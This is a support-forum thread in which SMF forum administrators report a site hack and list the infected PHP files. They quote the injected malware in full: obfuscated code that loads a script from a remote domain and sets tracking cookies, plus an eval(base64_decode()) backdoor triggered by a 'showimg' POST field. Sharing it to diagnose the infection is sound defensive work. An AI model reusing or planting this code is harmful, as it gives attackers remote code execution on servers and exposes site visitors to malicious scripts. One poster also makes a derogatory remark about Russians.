SMF Support > SMF 2.0.x Support

Weird indexing issue? Need help

<< < (2/3) > >>

vbgamer45:
I would reupload all the files..

Alb0:
So what you're basically saying is a fresh re-install of SMF? That would mean I would have to do everything over, come to mods, custom work, everything? This is a real bummer. As I don't see any other way.

Alb0:
This code seems to have been inserted into most of the PHP files, which wasn't there prior.


--- Quote ---$s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}
--- End quote ---

Any clue how I could remove that from the PHP files without have to go through each single one?

roqueiro:
I found this:

--- Quote ---$s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}if(isset($_POST["showimg"])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST["showimg"])));exit;}                                    
                                    $s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}if(isset($_POST["showimg"])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST["showimg"])));exit;}   

--- End quote ---

And this:

--- Quote ---                                    global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "hxxp:turnitupnow.net/?rnd= [nonactive]".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
--- End quote ---

In this files:
Base folder:
index.php
Settings.php

Sources folder:
Admin.php
Aeva-Sites.php
CustomForm.php
Display.php
Load.php
ManageBoards.php
ManageMaintenance.php
ManageSettings.php
ModerationCenter.php
ModSettings.php
PersonalMessage.php
Poll.php
Post.php
Profile-View.php
ScheduledTasks.php
Subs.php
Subs-Aeva.php
Subs-Aeva-Admin.php
Subs-Aeva-Custom-Example.php
Subs-Aeva-Sites.php
Subs-Boards.php
Subs-Editor.php
Subs-Members.php
Subs-Menu.php
Subs-Package.php
Subs-TopicRating.php

Themes\Default folder:
MessageIndex.template.php
TopicRating.template.php

Themes\Default\Language folder:
ManageScheduledTasks.english.php
Modifications.english.php
Modifications.portuguese_brazilian-utf8.php
TopicRating.english.php
TopicRating.russian.php
TopicRating.russian-utf8.php
TopicRating.spanish_es-utf8.php

Themes\Mytheme folder:
MessageIndex.template

IDK how this files as been hacked/modified. The modified date as not been changed.
For security, after correct files, change passwords.

Modify reason: Add Themes\Default\Language folder:

thecity:
I know someone using Wordpress, he has exact the same problem.
All the plugin files are infected with this malicious code.

Warning your host is a good idea. Those ****** russians..

Navigation

[0] Message Index

[#] Next page

[*] Previous page

Go to full version